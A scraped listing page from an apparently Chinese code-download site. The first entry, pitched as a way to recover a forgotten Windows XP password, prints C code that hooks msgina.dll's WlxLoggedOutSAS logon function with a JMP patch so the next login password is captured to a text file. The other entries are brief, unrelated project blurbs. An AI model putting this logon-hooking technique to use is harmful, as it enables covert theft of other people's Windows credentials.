-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
时间和费用管理
一个开放源码的“时间和费用管理系统”,由initechs,LLC组成。系统跟踪时间和费用项目的项目和客户的员工和承包商的报告,自动生成发票的详细信息。您可以打印每周的时间卡和雇员开支报告,项目,和帐户。它允许您在生成发票审批时间和费用。
- 2022-09-26 17:25:03下载
- 积分:1
-
MEGA16开发板,驱动开发板上的1602液晶
MEGA16开发板,驱动开发板上的1602液晶
-MEGA 16 1602
- 2023-01-30 20:45:08下载
- 积分:1
-
简单的学生管理系统,适合初学者
这是一个采用SSM框架的项目,前端页面结合了BootStrap和Layui框架,简单易上手。但是实现的业务逻辑很全面,包含了增、删、改、查、分页、下载、上传等许多关键性知识。
- 2022-02-05 03:27:01下载
- 积分:1
-
元胞自动机的模拟和实际例子希望对你有所帮助
元胞自动机的模拟和实际例子希望对你有所帮助-yuanbaozidongjidemoniheshijilizixiwangduiniyousuobangzu
- 2022-01-26 03:59:53下载
- 积分:1
-
邮编区号查询2.6
邮编区号查询2.6-Zip code inquiries 2.6
- 2022-12-23 01:10:03下载
- 积分:1
-
Windows file system filter driver and application procedures, the open
Windows文件系统过滤驱动和应用程序,在开源项目上改进的。请用tar解压缩的-Windows file system filter driver and application procedures, the open-source project for improvement. Is a compressed tar
- 2022-02-25 08:18:28下载
- 积分:1
-
" Remote continued margin" in VFP chapter
《远程续缘》之VFP篇,学习必备的好东西-" Remote continued margin" in VFP chapter
- 2022-03-28 23:44:21下载
- 积分:1
-
此程序基于VB开发环境,主要介绍怎样对应用程序的优化.
此程序基于VB开发环境,主要介绍怎样对应用程序的优化.-this procedure VB-based development environment, focusing on how to optimize the application.
- 2022-03-19 00:47:00下载
- 积分:1
-
VB简单写的一个 希望大家喜欢啊 可以下载了吗
VB简单写的一个 希望大家喜欢啊 可以下载了吗-writed by VB, I hope that everybody can like it, now can I download resource?
- 2022-07-09 15:12:26下载
- 积分:1